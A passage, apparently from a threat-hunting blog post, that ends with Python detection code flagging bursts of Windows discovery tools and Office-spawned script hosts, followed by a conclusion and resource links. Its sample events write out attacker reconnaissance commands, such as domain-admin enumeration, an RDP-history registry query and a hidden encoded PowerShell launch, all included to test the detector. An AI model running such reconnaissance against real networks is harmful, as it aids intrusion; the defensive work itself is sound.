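                     min_distinct: int = 5) -> List[Tuple[str, str, datetime, List[str]]]:
    """Per (host, user), find the window holding the most distinct discovery tools and report it
    when that count reaches `min_distinct`. Returns (computer, user, window start, tools)."""
    window = timedelta(seconds=window_seconds)
    by_key: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for ev in events:
        image = basename(ev["Image"])
        if image in DISCOVERY_BINARIES:
            by_key[(ev["Computer"], ev["User"])].append((parse_ts(ev["UtcTime"]), image))
    alerts = []
    for (computer, user), items in by_key.items():
        items.sort()
        best, best_start, start = set(), None, 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:  # slide the window's left edge forward
                start += 1
            distinct = {image for _, image in items[start:end + 1]}
            if len(distinct) > len(best):
                best, best_start = distinct, items[start][0]
        if len(best) >= min_distinct:
            alerts.append((computer, user, best_start, sorted(best)))
    return alerts


def suspicious_parent_child(events: List[Event]) -> List[Tuple[str, str, str, str]]:
    """(computer, parent, child, command line) for document/archiver parents spawning script hosts."""
    return [(ev["Computer"], basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"])
            for ev in events
            if basename(ev["ParentImage"]) in DOCUMENT_PARENTS and basename(ev["Image"]) in SCRIPT_CHILDREN]


def _ev(utc, computer, user, image, parent, cmdline) -> Event:
    return {"UtcTime": utc, "Computer": computer, "User": user,
            "Image": image, "ParentImage": parent, "CommandLine": cmdline}


S32 = r"C:\Windows\System32"
PS = S32 + r"\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: WS01 is an administrator doing ordinary things spread over hours;
# WS02 is a document-launched PowerShell running the discovery chain within twenty seconds.
SAMPLE_EVENTS = [
    _ev("2021-01-20 08:00:00", "WS01", r"CORP\bob", S32 + r"\ipconfig.exe", S32 + r"\cmd.exe", "ipconfig /all"),
    _ev("2021-01-20 09:30:00", "WS01", r"CORP\bob", S32 + r"\net.exe", S32 + r"\cmd.exe", "net use"),
    _ev("2021-01-20 11:00:00", "WS01", r"CORP\bob", S32 + r"\whoami.exe", S32 + r"\cmd.exe", "whoami"),
    _ev("2021-01-20 11:00:05", "WS01", r"CORP\bob", PS, r"C:\Windows\explorer.exe", "powershell.exe"),
    _ev("2021-01-20 09:59:40", "WS02", r"CORP\alice", PS,
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "powershell -w hidden -enc [REDACTED]"),
    _ev("2021-01-20 10:00:01", "WS02", r"CORP\alice", S32 + r"\whoami.exe", PS, "whoami"),
    _ev("2021-01-20 10:00:02", "WS02", r"CORP\alice", S32 + r"\HOSTNAME.EXE", PS, "hostname"),
    _ev("2021-01-20 10:00:03", "WS02", r"CORP\alice", S32 + r"\ipconfig.exe", PS, "ipconfig /all"),
    _ev("2021-01-20 10:00:05", "WS02", r"CORP\alice", S32 + r"\net.exe", PS, "net user /domain"),
    _ev("2021-01-20 10:00:06", "WS02", r"CORP\alice", S32 + r"\net.exe", PS, 'net group "domain admins" /domain'),
    _ev("2021-01-20 10:00:08", "WS02", r"CORP\alice", S32 + r"\NETSTAT.EXE", PS, "netstat -an"),
    _ev("2021-01-20 10:00:09", "WS02", r"CORP\alice", S32 + r"\tasklist.exe", PS, "tasklist"),
    _ev("2021-01-20 10:00:15", "WS02", r"CORP\alice", S32 + r"\systeminfo.exe", PS, "systeminfo"),
    _ev("2021-01-20 10:00:20", "WS02", r"CORP\alice", S32 + r"\reg.exe", PS,
        r'reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"'),
]

if __name__ == "__main__":
    for computer, user, start, tools in discovery_bursts(SAMPLE_EVENTS):
        print(f"{computer} {user}: {len(tools)} discovery tools from {start}: {', '.join(tools)}")
    for computer, parent, child, cmd in suspicious_parent_child(SAMPLE_EVENTS):
        print(f"{computer}: {parent} -> {child}: {cmd}")
```

Bob runs three of the same binaries but hours apart, so he never reaches the threshold, and his PowerShell comes from explorer.exe rather than an Office process; only Alice's session trips both checks. The window length and the distinct-tool threshold are the knobs you baseline per environment.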
Conclusion
We’ve taken a look in this first part at some of the most common Windows utilities and open source tools used by malware in recent years. We’ve also covered some ideas for detection and hunting.
Thanks for reading. If you have any questions or additions, hit me up on Twitter @nas_bench.
Resources
- https://thedfirreport.com/
- https://redcanary.com/blog/
- https://attack.mitre.org/
- https://www.fireeye.com/blog.html
- https://research.checkpoint.com/
- https://lolbas-project.github.io/
- https://docs.microsoft.com/en-us/
- https://any.run/
- http://tria.ge/
- https://www.hybrid-analysis.com/
- https://cyberpolygon.com/materials/
- https://www.crowdstrike.com/blog/
- https://labs.inquest.net/
- https://symantec-enterprise-blogs.security.com/blogs/
- https://www.microsoft.com/security/blog/